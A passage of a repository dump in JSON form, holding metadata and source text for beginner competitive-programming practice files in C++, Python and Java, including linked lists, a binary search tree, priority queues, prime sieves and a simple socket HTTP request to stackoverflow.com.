len(l):\n self.head = self.head.next\n else:\n temp = self.head\n for i in range(0, len(l)-n-1):\n temp = temp.next\n temp.next = temp.next.next\n \n \nif __name__ == '__main__':\n l = [1,2,3,4,5]\n \n llist = LL(l[0])\n for i in range(1, len(l)):\n llist.attachLink(l[i])\n \n llist.printLL()\n \n \n # remove nth Node from end\n n = int(input())\n llist.remove(n,l)\n llist.printLL()\n " }, { "alpha_fraction": 0.5441176295280457, "alphanum_fraction": 0.5735294222831726, "avg_line_length": 15.975000381469727, "blob_id": "1c3dc26645b8943769aa0e6e81fd91ce2dbaeec6", "content_id": "68e22310e3d504e15e26b1e2ff8049dc271df34a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 680, "license_type": "permissive", "max_line_length": 91, "num_lines": 40, "path": "/C++/tree/priority_queue.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<iostream>\n#include<queue>\nusing namespace std;\n\nint main()\n{\n\tcout << \"Priority queue\" << \"\\n\";\n\tpriority_queue< int > pqueue; // Default Max heap, To get MIN vals - store the values by \n\t\t\t\t\t\t\t\t\t// multiplying -1 and push to queue\n\tpqueue.push(5);\n\tpqueue.push(1);\n\tpqueue.push(7);\n\tpqueue.push(2);\n\tpqueue.push(10);\n\t\n\twhile(!pqueue.empty())\n\t{\n\t\tint val = pqueue.top();\n\t\tcout << val << \"\\t\";\n\t\tpqueue.pop();\n\t}\n\t\n\tcout << \"\\n\";\n\t\n\tpriority_queue< int > minq;\n\tminq.push(-5); // Pushing 5, 1, 7, 2, 10\n\tminq.push(-1);\n\tminq.push(-7);\n\tminq.push(-2);\n\tminq.push(-10);\n\t\n\twhile(!minq.empty())\n\t{\n\t\tint val = minq.top();\n\t\tcout << -1*val << \"\\t\";\n\t\tminq.pop();\n\t}\n\t\n\n}\n\n" }, { "alpha_fraction": 0.6984127163887024, "alphanum_fraction": 0.6984127163887024, "avg_line_length": 16.85714340209961, "blob_id": "ad2189f13c73b85585388e7f507fb3d71885793a", "content_id": "67f21f94d062f665003facef1a8511efb941265c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 126, "license_type": "permissive", "max_line_length": 82, "num_lines": 7, "path": "/README.md", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# Programming \n\nCode of most of the questions that I practiced in codechef, codeforces & leetcode\n\n## Authors\n\n* **T P V Krishna Teja**\n\n" }, { "alpha_fraction": 0.4121405780315399, 
"alphanum_fraction": 0.4760383367538452, "avg_line_length": 15.526315689086914, "blob_id": "765733b1443d4d8b1159f910666a4bec885f879a", "content_id": "69309e791f3504045037ecbb5a5f981f820517bb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 313, "license_type": "permissive", "max_line_length": 54, "num_lines": 19, "path": "/python/NumCharSpl.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 7 10:17:36 2020\n\n@author: teja\n\"\"\"\n\ns = '12asdbkFWS(#@!qde'\ncn = 0\nca = 0\ncspl = 0\nfor i in range(len(s)):\n if s[i].isalpha():\n ca+=1\n elif s[i].isnumeric():\n cn+=1\n else:\n cspl+=1\nprint(str(cn) + \" \" + str(ca) + \" \" + str(cspl) + \" \")" }, { "alpha_fraction": 0.41085270047187805, "alphanum_fraction": 0.5348837375640869, "avg_line_length": 12, "blob_id": "908478bf9632151cf80d2c20fe8a6e5915b11613", "content_id": "b72c868fdd58432a2009a670591b033bdcbe64cd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "permissive", "max_line_length": 35, "num_lines": 10, "path": "/python/index_prac.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 7 10:15:57 2020\n\n@author: teja\n\"\"\"\n\nn = 10\nfor i in range(n, 5, -2):\n print(i)" }, { "alpha_fraction": 0.39376771450042725, "alphanum_fraction": 0.41265344619750977, "avg_line_length": 19, "blob_id": "3b293981311eaf74f4da8ed590bf69d5ec7dbefd", "content_id": "5de652ac4c0524a197ac5f0e682d94bd07e5d72b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1059, "license_type": "permissive", "max_line_length": 35, "num_lines": 53, "path": "/openlab_coding_preperation/BST_Construction.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 5 11:52:19 2020\n\n@author: krish\n\"\"\"\n\nclass Node:\n def __init__(self,data):\n self.data = data\n self.left = None\n self.right = None\n \n\ndef addNode(root, data):\n node = Node(data)\n temp = root\n while(temp):\n if(data < temp.data):\n if temp.left == None:\n temp.left = node\n break\n else:\n temp = temp.left\n \n elif(data > temp.data):\n if temp.right == None:\n temp.right = node\n break\n else:\n temp = temp.right\n \ndef inorder(node):\n if(node):\n \n if node.left:\n inorder(node.left)\n \n print(node.data, end=\" \")\n \n if node.right :\n inorder(node.right)\n \n\n\nif __name__ == '__main__':\n \n l = [1, 2, 5, 7, 8, 3]\n root = Node(l[0])\n for i in range(1, len(l)):\n addNode(root, l[i])\n \n inorder(root)" }, { "alpha_fraction": 0.32972973585128784, "alphanum_fraction": 0.3581081032752991, "avg_line_length": 10.059701919555664, "blob_id": "36c9750d6ce720376741693750f4064fa9531ce1", "content_id": "71bd88fa9f3e0ffea2b5dab2023397da2980ca61", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 740, "license_type": "permissive", "max_line_length": 35, "num_lines": 67, "path": "/C++/ZCO14001.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\t ios_base::sync_with_stdio(false);\n cin.tie(NULL);\n\tint n,i;\n\tlong h;\n\tcin >> n;\n\tcin >> h;\n\tvector< int >a(n);\n\tvector < int >b();\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> 
a[i];\n\t}\n\tint w = 1;\n\ti = 0;\n\tint up = 0, t = 0;\n\twhile(w!=0 && t ==0)\n\t{\n\t\tcin >> w;\n\t\tswitch(w)\n\t\t{\n\t\t\tcase 0:\n\t\t\t\tt = 1;\n\t\t\t\tbreak;\n\t\t\t\t\n\t\t\tcase 1:\n\t\t\t\tif(i != 0)\n\t\t\t\t{\n\t\t\t\t\t--i;\t\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\t\n\t\t\tcase 2:\n\t\t\t\tif(i != n-1)\n\t\t\t\t{\n\t\t\t\t\ti++;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\t\t\n\t\t\tcase 3:\n\t\t\t\tif(up == 0 && a[i]!=0)\n\t\t\t\t{\n\t\t\t\t\tup = 1;\n\t\t\t\t\t--a[i];\t\t\t\t\t\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\t\t\n\t\t\tcase 4:\n\t\t\t\tif(up == 1 && a[i] < h)\n\t\t\t\t{\n\t\t\t\t\t++a[i];\n\t\t\t\t\tup = 0;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t}\n\t\t\n\t}\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcout << a[i] << \" \";\n\t}\n\t\n}" }, { "alpha_fraction": 0.3805811405181885, "alphanum_fraction": 0.4167257249355316, "avg_line_length": 12.177570343017578, "blob_id": "cc5c8c5e59101906aae46fcc617050c146f6e055", "content_id": "9628e65761261d2b9074679ab2f0fd280d1e0360", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1411, "license_type": "permissive", "max_line_length": 38, "num_lines": 107, "path": "/April Long_2020/Unit GCD - version 2.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nvoid prime(int n, vector<bool> &check)\n{\n\tlong long i, j;\n\tcheck[0] = false;\n\tcheck[1] = false;\n\tfor(i=2;i*i<=n;i++)\n\t{\n\t\tif(i > n/2)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tif(check[i] == true)\n\t\t{\n\t\t\tfor(j=i*i; j <= n;j = j + i)\n\t\t\t{\n\t\t\t\tcheck[j] = false;\n\t\t\t}\t\n\t\t}\n\t}\n\t\n\tfor(i=i;i<=n;i++)\n\t{\n\t\tif(check[i] == true)\n\t\t{\n\t\t\tfor(j=2; i*j <= n;j++)\n\t\t\t{\n\t\t\t\tcheck[i*j] = false;\n\t\t\t}\t\n\t\t}\n\t}\t\n}\n\nint main()\n{\n\tint t, n ,i ,j;\n\tcin >> t;\n\tvector<bool> check(1000001, true);\n\tprime(1000001, check);\n\n\t\n\twhile(t--)\n\t{\n\t\tcin >> n;\n\t\tvector<vector<int>> ans(1000001);\n\t\tint days = 1;\n\t\tvector<bool> rest = check;\n\t\t\n\t\tans[0].push_back(1);\n\t\tfor(i=0;i <= n; i++)\n\t\t{\n\t\t\tif(rest[i] == true)\n\t\t\t{\n\t\t\t\tans[0].push_back(i);\t\n\t\t\t}\n\t\t}\n\t\t\n\t\tfor(i=2;2*i<=n;i++)\n\t\t{\n\t\t\tans[days].push_back(2*i);\n\t\t\trest[2*i] = true;\t\t\t\n\t\t\tdays++;\n\t\t}\n\t\tcout << days << \"\\n\";\t\t\t\n\t\t\n\t\tint temp, k = 1;\n\t\tbool flag = true;\n\t\tfor(i=9;i<=n;i++)\n\t\t{\n\t\t\tif(rest[i] == 0)\n\t\t\t{\n\t\t\t\tflag = true;\n\t\t\t\twhile(flag)\n\t\t\t\t{\n\t\t\t\t\tif(__gcd(ans[k][0], i) != 1)\n\t\t\t\t\t{\n\t\t\t\t\t\t++k;\n\t\t\t\t\t}\n\t\t\t\t\telse\t\n\t\t\t\t\t{\n\t\t\t\t\t\tans[k].push_back(i);\n\t\t\t\t\t\t++k;\n\t\t\t\t\t\tflag = false;\t\t\t\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t}\n\t\tfor(i=0;i<1000001;i++)\n\t\t{\n\t\t\tif(ans[i].size() == 0)\n\t\t\t{\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\tcout << ans[i].size() << \" \";\n\t\t\tfor(j=0;j<ans[i].size();j++)\n\t\t\t{\n\t\t\t\tcout << ans[i][j] << \" \";\n\t\t\t}\n\t\t\tcout << \"\\n\";\n\t\t}\n//\t\tcout << \"ran succ\\n\";\n\t\t}\n\t\treturn 0;\n\t}\t\n" }, { "alpha_fraction": 0.41203704476356506, "alphanum_fraction": 0.46990740299224854, "avg_line_length": 13.366666793823242, "blob_id": "a3cf6f913a3de97704eea5b0ab0c8edf9773e1ad", "content_id": "6456ba35910afa8d2211b5b99d7bc0b37e7288b9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 432, "license_type": "permissive", "max_line_length": 45, "num_lines": 30, "path": "/April Long_2020/Sell All the Cars.cpp", 
"repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint t, n, i;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tcin >> n;\n\t\tvector< long >vec(n);\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> vec[i];\n\t\t}\n\t\tsort(vec.begin(), vec.end());\n\t\treverse(vec.begin(), vec.end());\n\t\tlong long ans = 0;\n\t\tint temp = 0;\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tif(vec[i] - i > 0)\n\t\t\t{\n\t\t\t\tans = ans + ((vec[i] - i) % 1000000007);\t\n\t\t\t}\n\t\t}\n\t\tcout << ans % 1000000007 << \"\\n\";\n\t}\n\n}\n\n" }, { "alpha_fraction": 0.5826330780982971, "alphanum_fraction": 0.6610644459724426, "avg_line_length": 21.1875, "blob_id": "4e2853e9c07681d11f2813e10f3aa13448ccadc7", "content_id": "816856c4918bacfc36ff121aef0bc6bfb986867c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 357, "license_type": "permissive", "max_line_length": 56, "num_lines": 16, "path": "/python/Linkedlist/stack.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 15 15:48:49 2019\n\n@author: teja\n\"\"\"\n\nimport socket\nrequest = b\"GET / HTTP/1.1\\nHost: stackoverflow.com\\n\\n\"\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((\"stackoverflow.com\", 80))\ns.send(request)\nresult = s.recv(10000)\nwhile (len(result) > 0):\n print(result)\n result = s.recv(10000) " }, { "alpha_fraction": 0.5057914853096008, "alphanum_fraction": 0.5173745155334473, "avg_line_length": 15.1875, "blob_id": "832f251c9398bf8bb0ffe6070ad2c964e3154e8d", "content_id": "780d807dc48085ea6face435ede72ed1db2464b6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 259, "license_type": "permissive", "max_line_length": 44, "num_lines": 16, "path": "/C++/set/set.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\nint main()\n{\n\tset < int > a;\n\ta.insert(2);\n\ta.insert(3);\n\tset< int > :: iterator itr;\n\tint i;\n\tint pos = a.find(3);\n\tcout << pos <<\"\\n\";\n\tfor(itr = a.begin(); itr != a.end(); itr++)\n\t{\n\t\tcout << *itr << \"\\n\";\n\t}\n}\n" }, { "alpha_fraction": 0.5051546096801758, "alphanum_fraction": 0.5206185579299927, "avg_line_length": 12.857142448425293, "blob_id": "208bd894a2f6fa381fe74876b502aef0b2078401", "content_id": "112e93e00b5a5a9b53099a77a0d6639599f3228b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 194, "license_type": "permissive", "max_line_length": 28, "num_lines": 14, "path": "/C++/Unordered set - HashMap/Unordered set.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\n#include<unordered_set>\nusing namespace std;\n\nint main()\n{\n\tunordered_map <int, int> a;\n\ta[3]++;\n\tcout << a[3];\n//\tfor(i=0;i<n;i++)\n//\t{\n//\t\tcout << a[i] << \"\\n\";\n//\t}\n}\n" }, { "alpha_fraction": 0.46724891662597656, "alphanum_fraction": 0.4978165924549103, "avg_line_length": 12.470588684082031, "blob_id": "0d9f979e5d46a78f26bd5439fdb6fbdff0ea1379", "content_id": "026ff42de44bc4e264dd4ea61c5c0ec37c1a0fdb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 229, "license_type": "permissive", "max_line_length": 28, "num_lines": 17, "path": "/C++/Unordered set - HashMap/iteration.cpp", "repo_name": 
"Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\n#include<unordered_map>\nusing namespace std;\n\nint main()\n{\n\tunordered_map < int,int >a;\n\tfor(int i = 0; i < 10; i++)\n\t{\n\t\ta[i] = a[i] + 1;\n\t}\n\t\n\tfor(int i = 0; i < 10; i++)\n\t{\n\t\tcout << a[i] << \"\\n\";\n\t}\n}\n" }, { "alpha_fraction": 0.40122511982917786, "alphanum_fraction": 0.42879021167755127, "avg_line_length": 12.079999923706055, "blob_id": "52c9400517f6b9534192f4d68ca405a1d4d0e91e", "content_id": "10bc99269ebdf0d28ec287bfd8b67929258d69d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 653, "license_type": "permissive", "max_line_length": 41, "num_lines": 50, "path": "/C++/CHDIGER.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint t;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tstring n,res = \"\";\n\t\tint d,i;\n\t\tcin >> n >> d;\n\t\tstring arr = \"0123456789\";\n\t\tint st = 0; \n\t\twhile(true)\n\t\t{\n\t\t\tint minindex = -1;\n\t\t\tint\t minval = d;\n\t\t\tfor(i=st;i<n.length();i++ )\n\t\t\t{\n\t\t\t\tif(n[i] - '0' < minval)\n\t\t\t\t{\n\t\t\t\t\tminval = n[i] - '0';\n\t\t\t\t\tminindex = i;\n\t\t\t\t}\t\n\t\t\t}\n\t\t\tif(minindex == -1)\n\t\t\t{\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tres = res + arr[minval];\n\t\t\t\tst = minindex + 1;\n\t\t\t}\n\t\t}\n\t\t\n\t\tint len = res.length();\n\t\tfor(i=0;i<len;i++)\n\t\t{\n\t\t\tcout << res[i];\n\t\t}\n\t\tfor(i = 0 ; i<(n.length() - len) ; i++)\n\t\t{\n\t\t\tcout << d;\n\t\t}\n\n\t\tcout << \"\\n\";\n\t}\n}" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.5, "avg_line_length": 11.315789222717285, "blob_id": "de1f1612bb54c76ff1af5cf2945907597b468945", "content_id": "bf2c36bc492c05106378ae108e29f55e9f57b6fa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 234, "license_type": "permissive", "max_line_length": 37, "num_lines": 19, "path": "/C++/structure.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nstruct point\n{\n\tint x;\n\tint y;\n};\n\nint main()\n{\n\tpoint p1 = {0, 1};\n\tcout << p1.x << \" \" << p1.y << \"\\n\";\n\t\n\t// Pointer for structure\n\tpoint* p2 = &p1;\n\tcout << p2->x << \" \" << p2->y;\n\t\n}\n" }, { "alpha_fraction": 0.3372780978679657, "alphanum_fraction": 0.36489152908325195, "avg_line_length": 13.941176414489746, "blob_id": "54cc355b263318bba8b21aa5382825b1359fa880", "content_id": "ce63c8ad7ee11ffb565fe5e2e5ebacd46b365957", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 507, "license_type": "permissive", "max_line_length": 68, "num_lines": 34, "path": "/C++/MAXREM.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tlong n;\n\tlong i;\n\tcin >> n;\n\tvector < long > a(n);\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> a[i];\n\t}\n//\tcout << a[n-1] << \"\\n\";\n\tsort(a.begin(),a.end());\n//\tfor(i=0;i<n;i++)\n//\t{\n//\t\tcout << a[i] << \"\\t\";\n//\t}\n\tfor(i=n-1;i>=1;i--)\n\t{\n//\t\tcout << i << \" \" << i-1 << \"\\n\"; \n//\t\tcout << a[i] << \" % \" << a[i-1] << \" = \" << a[i]%a[i-1] << \"\\n\";\n\t\tif(a[i]%a[i-1] != 0)\n\t\t{\n\t\t\tcout << a[i-1];\n\t\t\texit(0);\n\t\t}else if (i==1)\n\t\t{\n\t\t\tcout << a[i] % 
a[i-1];\n\t\t}\n\t\t\n\t}\n}" }, { "alpha_fraction": 0.38545453548431396, "alphanum_fraction": 0.39818182587623596, "avg_line_length": 11.813953399658203, "blob_id": "f2def6b1376005fb92d328de53d275b364264063", "content_id": "9f54fbbd0e41abe52d7a38543b1df48d4085f49e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 550, "license_type": "permissive", "max_line_length": 48, "num_lines": 43, "path": "/C++/ATTND.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint t;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tint n,i,j;\n\t\tcin >> n;\n\t\tvector< string >fname(n);\t\n\t\tvector< string >lname(n);\n\t\tvector< int >a(n,0);\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> fname[i];\n\t\t\tcin >> lname[i];\n\t\t}\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\t for(j=i+1;j<n;j++)\n\t\t\t {\n\t\t\t \tif(fname[i] == fname[j])\n\t\t\t \t{\n\t\t\t \t\ta[i] = a[j] = 1;\n\t\t\t\t}\n\t\t\t }\n\t\t}\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tif(a[i] == 1)\n\t\t\t{\n\t\t\t\tcout << fname[i] << \" \" << lname[i] << \"\\n\";\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tcout << fname[i] << \"\\n\";\n\t\t\t}\n\t\t}\n\t}\n\t\n}" }, { "alpha_fraction": 0.5772947072982788, "alphanum_fraction": 0.5869565010070801, "avg_line_length": 16.20833396911621, "blob_id": "d416975af8481c7e36ad538d6a68debe432d2df0", "content_id": "6e937375f43984d14737759eb03e9291846d939a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 414, "license_type": "permissive", "max_line_length": 60, "num_lines": 24, "path": "/Java/FLOW008.java", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "\nimport java.lang.*;\nimport java.util.*;\nimport java.lang.Math;\nclass example {\n\n\tpublic static void main(String[] args) {\n\t\t// TODO Auto-generated method stub\n\t\tScanner sc = new Scanner(System.in);\n\t\tint t, n;\n\t\tt = sc.nextInt();\n\t\twhile(t--!=0)\n\t\t{\n\t\t\tn = sc.nextInt();\n\t\t\tif(n < 10)\n\t\t\t{\n\t\t\t\tSystem.out.println(\"What an obedient servant you are!\");\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tSystem.out.println(\"-1\");\n\t\t\t}\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.4345238208770752, "alphanum_fraction": 0.4821428656578064, "avg_line_length": 15.75, "blob_id": "5a0ac60365737736a5274e8f23ff7872d43cc8b1", "content_id": "29a64c276ca8f1051cd19b6ca6bb9818783b72b9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 336, "license_type": "permissive", "max_line_length": 58, "num_lines": 20, "path": "/C++/StringtoInt-conversions.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tchar s = '9';\n//\tcout << int(s) - '0' << \"\\n\";\n\t\n\tstring str = \"01240000\";\n\tcout << stoi(str);\n\t\n//\tcout << 0%10;\n\t\n\tchar c[3] = {'1', 'c', '8'};\n//\tcout << atoi(c) << \"\\n\"; // atoi is only for char array\n\t\n//\tstr = \"zc\";\n//\tcout << stoi(str) << \"\\n\"; // this throws err\n\t\n}\n\n" }, { "alpha_fraction": 0.46268656849861145, "alphanum_fraction": 0.4726368188858032, "avg_line_length": 12.896552085876465, "blob_id": "82e094bc32c64e9d79ea7de192f5cb16444785c5", "content_id": "1169fbbd117f4e284b6991fc2ace6714d746779f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 402, "license_type": "permissive", 
"max_line_length": 34, "num_lines": 29, "path": "/C++/ZCO15002.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tios_base::sync_with_stdio(false);\n cin.tie(NULL);\n\tlong k,i,n,count = 0,j;\n\tcin >> n;\n\tcin >> k;\n\tvector < long >a(n);\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> a[i];\n\t}\n\tsort(a.begin(),a.end());\n\tfor(i=0;i<n;i++)\n\t{\n\t\tfor(j=i+1;j<n;j++)\n\t\t{\n\t\t\tif(abs(a[i] - a[j]) >= k)\n\t\t\t{\n\t\t\t\tcount = count + (n-j);\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\n\tcout << count << \"\\n\";\n}" }, { "alpha_fraction": 0.3775252401828766, "alphanum_fraction": 0.40909090638160706, "avg_line_length": 12.440677642822266, "blob_id": "93d4968404d82c8b3f126a6499274f03d1cacf94", "content_id": "a294b97203adfc046e956da3eba4052b0221e15b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 792, "license_type": "permissive", "max_line_length": 54, "num_lines": 59, "path": "/C++/STRCH.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\nint main()\n{\n\tint t,n;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tlong i,j,first,sec,diff=0,sum=0,size,tot=0,flag = 0;\n\t\tcin >> n;\n\t\tstring s;\n\t\tchar c;\n\t\tcin >> s;\n\t\tcin >> c;\n\t\tsize = s.size();\n\t\ttot = (size*(size+1))/2;\n\t\tfor(i=0;i<size;i++)\n\t\t{\n\t\t\tif(s[i] == c && i==0)\n\t\t\t{\n\t\t\t\tfirst = i;\n\t\t\t\tflag = 1;\n\t\t\t}\n\t\t\telse if(s[i] == c && flag == 0 && i>0)\n\t\t\t{\n\t\t\t\tflag = 1;\n\t\t\t\tfirst = i;\n\t\t\t\tsum+=(i*(i+1))/2;\n\t\t\t}\n\t\t\telse if(s[i] == c && i>0)\n\t\t\t{\n\t\t\t\tsec = i;\n\t\t\t\tdiff = sec - first - 1;\n\t\t\t\tsum+=(diff*(diff+1))/2;\n\t\t\t\tfirst = i;\n\t\t\t\tsec = 0;\n\t\t\t}\n\t\t}\n\t\tif(first != size-1)\n\t\t{\n\t\t\tsec = size - 1;\n\t\t\tdiff = sec - first;\n\t\t\tsum+=(diff*(diff+1))/2;\n\t\t}\n\t\tif(flag == 1)\n\t\t{\n\t\t\tcout << tot - sum << \"\\n\";\n\t\t}\n\t\telse\n\t\t{\n\t\t\tcout << \"0\" << \"\\n\";\n\t\t}\t\n\t}\n\t\n\n\t\n\t\n\t\n}" }, { "alpha_fraction": 0.3947681188583374, "alphanum_fraction": 0.41617122292518616, "avg_line_length": 12.564516067504883, "blob_id": "c4885da87bb885f6ae14f2828a76495fbb33e43b", "content_id": "71505b44311f0c55bb297470af9ad9e316b7d092", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 841, "license_type": "permissive", "max_line_length": 40, "num_lines": 62, "path": "/C++/XOR Engine.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tios_base::sync_with_stdio(false);\n cin.tie(NULL);\n \n int t, n, q, i, p, bits = 0;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tint even = 0, odd = 0;\n\t\tcin >> n;\n\t\tcin >> q;\n\t\tvector< int > val(n);\n\t\tvector< int > xoo(n);\n\t\tvector< int > eveo(n); //0-even, 1-odd\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> val[i];\n\t\t\tbits = __builtin_popcount(val[i]);\n\t\t\tif(bits % 2 == 0)\n\t\t\t{\n\t\t\t\teveo[i] = 0;\n\t\t\t\t++even;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\teveo[i] = 1;\n\t\t\t\t++odd;\n\t\t\t}\n\t\t}\n\t\twhile(q--)\n\t\t{\n\t\t\tint ceven = 0, codd = 0;\n\t\t\tcin >> p;\n\t\t\tbits = __builtin_popcount(p);\n\t\t\tif(bits % 2 == 0)\n\t\t\t{\n\t\t\t\tp = 0;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tp = 1;\n\t\t\t}\n\t\t\t\n\t\t\tif(p == 0)\n\t\t\t{\n\t\t\t\tcodd = odd;\n\t\t\t\tceven = even;\n\t\t\t}\n\t\t\t\n\t\t\tif(p 
== 1)\n\t\t\t{\n\t\t\t\tceven = odd;\n\t\t\t\tcodd = even;\t\n\t\t\t}\n\t\t\tcout << ceven << \" \" << codd << \"\\n\";\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.5043478012084961, "alphanum_fraction": 0.5260869860649109, "avg_line_length": 9.904762268066406, "blob_id": "7c75da2582df183c65d206cba81bfd45d5ea5e8f", "content_id": "e944324613388123e4637be67510a45c9fc27aa3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 230, "license_type": "permissive", "max_line_length": 26, "num_lines": 21, "path": "/C++/stack/stackWithheader.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<iostream>\n#include<stack>\nusing namespace std;\n\nint main()\n{\n\tstack <int> s;\n\ts.push(2);\n\ts.push(4);\n\ts.push(1);\n\t\n\tint len = s.size();\n\t\n\tfor(int i=0;i<len;i++)\n\t{\n\t\tcout << s.top() << \" \";\n\t\ts.pop();\n\t}\n\treturn 0;\n\n}\n\n" }, { "alpha_fraction": 0.5625, "alphanum_fraction": 0.5754310488700867, "avg_line_length": 18.29166603088379, "blob_id": "0a9d7f5f2123e9020bb9cb7a5734f0f1d0ea37bb", "content_id": "255e7fc8f3d4746465fbfc8b6e8f0b637f1c6912", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 464, "license_type": "permissive", "max_line_length": 41, "num_lines": 24, "path": "/Java/FLOW017.java", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "\nimport java.util.*;\nimport java.lang.Math;\nclass example {\n\n\tpublic static void 